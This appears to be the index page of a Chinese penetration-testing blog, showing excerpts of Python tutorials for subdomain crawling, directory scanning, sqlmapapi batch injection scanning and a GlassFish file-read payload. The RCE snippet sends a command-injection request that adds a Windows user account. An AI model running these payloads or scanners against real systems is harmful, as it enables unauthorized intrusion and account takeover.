安全开发
python安全开发-子域名爬取&ftp爆破

def baiud_get(): while not q.empty(): bd=q.get() req=requests.get(bd,headers=headers) time.sleep(4) baidu=req.text html=etree.HTML(baidu) ul=html.xpath('//h3[@class="c-title t t tts-title"]') for uls in ul: t=uls.xpath('./a[1]') for tt in t: ttt=tt.xpath('@href') r=requests.get(ttt[0]) print(r.url)

python开发-sqlmapapi接口批量扫描注入

在sqlmap目录下面还存在一个sqlmapapi.py的程序,sqlmap.py本身具有批量扫描的能力,常见批量扫描有使用-l参数扫描bur代理的日志目标或者-m扫描多个对象时候,推荐使用sqlmap的api接口,效率更高,sqlmapapi接口有两种使用方式,本地直接使用或者是当与本地不在一起时候,使用客户端与服务端连接使用,这两种使用方法就不做介绍了,今天介绍使用pytohn开发配合sqlmapapi接口批量扫描。

python安全开发-多线程目录扫描&端口扫描&子域名爆破

def scan(): while not q.empty(): dir=q.get() urls=url+dir urls=urls.replace("\n",'') code=requests.get(urls).status_code if code==200 or code==403: f=open("yes.txt","a+") f.write(urls) f.close else: print(urls+'|'+str(code)) time.sleep(1)

python安全开发-rce命令执行&请求测试&豆 ban的信息爬取

import requests url_add="/?search==%00{.exec|cmd%20/c%20net%20user%20bbbbb%20123%20/add.}" url="http://192.168.213.163/" urls=url+url_add print(urls) def add(): code=requests.get(urls).status_code if code ==200: print("yes+urls") else: print("no+urls") if __name__ == '__main__': add()

Python开发-fofa批量挖掘glassfish-任意读取漏洞

漏洞分析: glassfish是一款java编写的跨平台的开源的应用服务器。 与宽字节SQL注入一致,都是由于unicode编码歧义导致的。具体payload如下构造: https://your-ip:4848/theme/META-INF

构造EXP-Python盲注脚本

平常的盲注如果手工会很麻烦,多数情况都会借助sqlmap等相关软件跑,但是有些情况下,考虑到sqlmap的线程以及其他情况,会造成其他的影响,这里我们来简单使用python构造一个盲注脚本,低线程,高效率。

告白
告白
一个普通的干饭人🍚
公告
type
status
date
slug
summary
tags
category
icon
password
🎉告白的个人日常博客🎉
-- 关注微信公众号 ---
Gaobai文库
本站内存在文章缺失,框架组件问题待解决
原博客kxsy.work文章已在慢慢迁移本站
渗透时长两年半的个人练习生
-- 感谢您的支持 ---
👏欢迎阅览👏